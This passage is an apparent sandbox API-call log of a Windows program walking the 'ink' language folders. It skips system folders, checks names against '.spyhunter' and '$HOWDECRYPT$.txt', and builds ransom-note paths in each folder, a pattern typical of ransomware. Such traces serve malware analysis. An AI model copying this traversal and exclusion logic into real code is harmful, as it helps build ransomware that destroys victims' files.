(lpFirst="tipresx.dll.mui", lpSrch=".spyhunter") returned 0x0 [0086.102] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.102] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0086.102] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui") returned 76 [0086.102] GetProcessHeap () returned 0x2c0000 [0086.102] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x327398 [0086.102] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3710a8, Size=0x720) returned 0x3710a8 [0086.102] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0086.102] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0086.102] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\$HOWDECRYPT$.txt") returned 77 [0086.102] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\$HOWDECRYPT$.txt") returned 77 [0086.102] GetProcessHeap () returned 0x2c0000 [0086.102] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x326a88 [0086.102] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3710a8, Size=0x728) returned 0x3710a8 [0086.102] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.102] lstrcmpiW (lpString1="Content.xml", lpString2="Windows") returned -1 [0086.102] lstrlenW (lpString="Windows") returned 7 [0086.102] lstrcmpiW (lpString1="Content.xml", lpString2="$Recycle.bin") returned 1 [0086.102] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.102] lstrcmpiW (lpString1="Content.xml", lpString2="System Volume Information") returned -1 [0086.103] lstrlenW (lpString="System Volume Information") returned 25 [0086.103] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 66 [0086.103] StrStrIW (lpFirst="Content.xml", lpSrch=".spyhunter") returned 0x0 [0086.103] lstrcmpW (lpString1="Content.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.103] lstrcmpW (lpString1="Content.xml", lpString2="_uninstalling_.png") returned 1 [0086.103] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 66 [0086.103] GetProcessHeap () returned 0x2c0000 [0086.103] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc6) returned 0x32fce0 [0086.103] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3710a8, Size=0x730) returned 0x3710a8 [0086.103] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.103] lstrcmpiW (lpString1="ConvertInkStore.exe", lpString2="Windows") returned -1 [0086.103] lstrlenW (lpString="Windows") returned 7 [0086.104] lstrcmpiW (lpString1="ConvertInkStore.exe", lpString2="$Recycle.bin") returned 1 [0086.104] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.104] lstrcmpiW (lpString1="ConvertInkStore.exe", lpString2="System Volume Information") returned -1 [0086.104] lstrlenW (lpString="System Volume Information") returned 25 [0086.104] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe") returned 74 [0086.104] StrStrIW (lpFirst="ConvertInkStore.exe", lpSrch=".spyhunter") returned 0x0 [0086.104] lstrcmpW (lpString1="ConvertInkStore.exe", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.104] lstrcmpW (lpString1="ConvertInkStore.exe", lpString2="_uninstalling_.png") returned 1 [0086.104] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe") returned 74 [0086.104] GetProcessHeap () returned 0x2c0000 [0086.104] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd6) returned 0x32fdb0 [0086.104] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3710a8, Size=0x738) returned 0x3710a8 [0086.104] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.104] lstrcmpiW (lpString1="cs-CZ", lpString2="Windows") returned -1 [0086.104] lstrlenW (lpString="Windows") returned 7 [0086.104] lstrcmpiW (lpString1="cs-CZ", lpString2="$Recycle.bin") returned 1 [0086.104] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.104] lstrcmpiW (lpString1="cs-CZ", lpString2="System Volume Information") returned -1 [0086.104] lstrlenW (lpString="System Volume Information") returned 25 [0086.104] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ") returned 60 [0086.104] lstrcmpW (lpString1="cs-CZ", lpString2=".") returned 1 [0086.104] lstrcmpW (lpString1="cs-CZ", lpString2="..") returned 1 [0086.104] GetProcessHeap () returned 0x2c0000 [0086.104] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x340fe8 [0086.104] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\*") returned 62 [0086.104] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0086.105] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.105] lstrlenW (lpString="Windows") returned 7 [0086.105] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.105] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.105] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.105] lstrlenW (lpString="System Volume Information") returned 25 [0086.105] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\.") returned 62 [0086.105] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.105] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0086.105] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.105] lstrlenW (lpString="Windows") returned 7 [0086.105] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.105] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.105] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.105] lstrlenW (lpString="System Volume Information") returned 25 [0086.105] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\..") returned 63 [0086.105] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.105] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.105] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0086.106] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0086.106] lstrlenW (lpString="Windows") returned 7 [0086.106] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="$Recycle.bin") returned 1 [0086.106] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.106] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="System Volume Information") returned 1 [0086.106] lstrlenW (lpString="System Volume Information") returned 25 [0086.106] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 76 [0086.106] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".spyhunter") returned 0x0 [0086.106] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.106] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0086.106] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 76 [0086.106] GetProcessHeap () returned 0x2c0000 [0086.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x3279f0 [0086.106] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3710a8, Size=0x740) returned 0x3710a8 [0086.106] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0086.106] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0086.106] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\$HOWDECRYPT$.txt") returned 77 [0086.106] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\$HOWDECRYPT$.txt") returned 77 [0086.106] GetProcessHeap () returned 0x2c0000 [0086.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x327ad8 [0086.106] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3710a8, Size=0x748) returned 0x3710a8 [0086.106] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.106] lstrcmpiW (lpString1="da-DK", lpString2="Windows") returned -1 [0086.106] lstrlenW (lpString="Windows") returned 7 [0086.106] lstrcmpiW (lpString1="da-DK", lpString2="$Recycle.bin") returned 1 [0086.107] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.107] lstrcmpiW (lpString1="da-DK", lpString2="System Volume Information") returned -1 [0086.107] lstrlenW (lpString="System Volume Information") returned 25 [0086.107] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK") returned 60 [0086.107] lstrcmpW (lpString1="da-DK", lpString2=".") returned 1 [0086.107] lstrcmpW (lpString1="da-DK", lpString2="..") returned 1 [0086.107] GetProcessHeap () returned 0x2c0000 [0086.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x340fe8 [0086.107] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\*") returned 62 [0086.107] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0086.107] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.107] lstrlenW (lpString="Windows") returned 7 [0086.107] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.107] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.107] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.107] lstrlenW (lpString="System Volume Information") returned 25 [0086.107] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\.") returned 62 [0086.107] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.107] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0086.108] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.108] lstrlenW (lpString="Windows") returned 7 [0086.108] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.108] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.108] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.108] lstrlenW (lpString="System Volume Information") returned 25 [0086.108] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\..") returned 63 [0086.108] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.108] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.108] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0086.108] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0086.108] lstrlenW (lpString="Windows") returned 7 [0086.108] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="$Recycle.bin") returned 1 [0086.108] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.108] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="System Volume Information") returned 1 [0086.108] lstrlenW (lpString="System Volume Information") returned 25 [0086.108] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned 76 [0086.108] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".spyhunter") returned 0x0 [0086.108] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.108] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0086.108] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned 76 [0086.108] GetProcessHeap () returned 0x2c0000 [0086.108] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x327bc0 [0086.108] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3710a8, Size=0x750) returned 0x3710a8 [0086.108] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0086.108] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0086.109] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\$HOWDECRYPT$.txt") returned 77 [0086.109] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\$HOWDECRYPT$.txt") returned 77 [0086.109] GetProcessHeap () returned 0x2c0000 [0086.109] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x327ca8 [0086.109] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3710a8, Size=0x758) returned 0x3710a8 [0086.109] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.109] lstrcmpiW (lpString1="de-DE", lpString2="Windows") returned -1 [0086.109] lstrlenW (lpString="Windows") returned 7 [0086.109] lstrcmpiW (lpString1="de-DE", lpString2="$Recycle.bin") returned 1 [0086.109] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.109] lstrcmpiW (lpString1="de-DE", lpString2="System Volume Information") returned -1 [0086.109] lstrlenW (lpString="System Volume Information") returned 25 [0086.109] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE") returned 60 [0086.109] lstrcmpW (lpString1="de-DE", lpString2=".") returned 1 [0086.109] lstrcmpW (lpString1="de-DE", lpString2="..") returned 1 [0086.109] GetProcessHeap () returned 0x2c0000 [0086.109] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x340fe8 [0086.109] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\*") returned 62 [0086.109] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0086.336] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.336] lstrlenW (lpString="Windows") returned 7 [0086.336] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.336] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.336] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.336] lstrlenW (lpString="System Volume Information") returned 25 [0086.336] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\.") returned 62 [0086.336] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.336] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0086.336] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.336] lstrlenW (lpString="Windows") returned 7 [0086.336] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.336] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.336] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.337] lstrlenW (lpString="System Volume Information") returned 25 [0086.337] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\..") returned 63 [0086.337] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.337] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.337] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0086.337] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0086.337] lstrlenW (lpString="Windows") returned 7 [0086.337] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="$Recycle.bin") returned 1 [0086.337] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.337] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="System Volume Information") returned 1 [0086.337] lstrlenW (lpString="System Volume Information") returned 25 [0086.337] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui") returned 76 [0086.337] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".spyhunter") returned 0x0 [0086.337] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.337] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0086.337] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui") returned 76 [0086.337] GetProcessHeap () returned 0x2c0000 [0086.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x371820 [0086.337] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3710a8, Size=0x760) returned 0x373808 [0086.338] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0086.338] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0086.338] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\$HOWDECRYPT$.txt") returned 77 [0086.338] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\$HOWDECRYPT$.txt") returned 77 [0086.338] GetProcessHeap () returned 0x2c0000 [0086.338] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x371908 [0086.338] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x373808, Size=0x768) returned 0x373808 [0086.338] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.338] lstrcmpiW (lpString1="el-GR", lpString2="Windows") returned -1 [0086.338] lstrlenW (lpString="Windows") returned 7 [0086.338] lstrcmpiW (lpString1="el-GR", lpString2="$Recycle.bin") returned 1 [0086.338] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.338] lstrcmpiW (lpString1="el-GR", lpString2="System Volume Information") returned -1 [0086.338] lstrlenW (lpString="System Volume Information") returned 25 [0086.338] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR") returned 60 [0086.338] lstrcmpW (lpString1="el-GR", lpString2=".") returned 1 [0086.338] lstrcmpW (lpString1="el-GR", lpString2="..") returned 1 [0086.338] GetProcessHeap () returned 0x2c0000 [0086.338] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x340fe8 [0086.338] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\*") returned 62 [0086.338] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0086.339] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.339] lstrlenW (lpString="Windows") returned 7 [0086.339] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.339] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.339] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.339] lstrlenW (lpString="System Volume Information") returned 25 [0086.339] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\.") returned 62 [0086.339] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.339] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0086.339] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.339] lstrlenW (lpString="Windows") returned 7 [0086.339] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.339] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.339] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.339] lstrlenW (lpString="System Volume Information") returned 25 [0086.339] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\..") returned 63 [0086.339] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.339] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.339] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0086.339] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0086.339] lstrlenW (lpString="Windows") returned 7 [0086.339] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="$Recycle.bin") returned 1 [0086.339] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.339] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="System Volume Information") returned 1 [0086.340] lstrlenW (lpString="System Volume Information") returned 25 [0086.340] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\tipresx.dll.mui") returned 76 [0086.340] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".spyhunter") returned 0x0 [0086.340] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.340] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0086.340] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\tipresx.dll.mui") returned 76 [0086.340] GetProcessHeap () returned 0x2c0000 [0086.340] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x3719f0 [0086.340] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x373808, Size=0x770) returned 0x373808 [0086.340] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0086.340] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0086.340] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\$HOWDECRYPT$.txt") returned 77 [0086.340] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\$HOWDECRYPT$.txt") returned 77 [0086.340] GetProcessHeap () returned 0x2c0000 [0086.340] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x371ad8 [0086.340] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x373808, Size=0x778) returned 0x373808 [0086.340] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.340] lstrcmpiW (lpString1="en-US", lpString2="Windows") returned -1 [0086.340] lstrlenW (lpString="Windows") returned 7 [0086.340] lstrcmpiW (lpString1="en-US", lpString2="$Recycle.bin") returned 1 [0086.340] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.340] lstrcmpiW (lpString1="en-US", lpString2="System Volume Information") returned -1 [0086.340] lstrlenW (lpString="System Volume Information") returned 25 [0086.340] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US") returned 60 [0086.340] lstrcmpW (lpString1="en-US", lpString2=".") returned 1 [0086.340] lstrcmpW (lpString1="en-US", lpString2="..") returned 1 [0086.341] GetProcessHeap () returned 0x2c0000 [0086.341] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x340fe8 [0086.341] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\*") returned 62 [0086.341] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0086.345] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.345] lstrlenW (lpString="Windows") returned 7 [0086.345] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.345] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.345] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.345] lstrlenW (lpString="System Volume Information") returned 25 [0086.345] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\.") returned 62 [0086.345] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.346] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0086.346] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.346] lstrlenW (lpString="Windows") returned 7 [0086.346] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.346] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.346] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.346] lstrlenW (lpString="System Volume Information") returned 25 [0086.346] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\..") returned 63 [0086.346] lstrcmpW (lpString1="..", 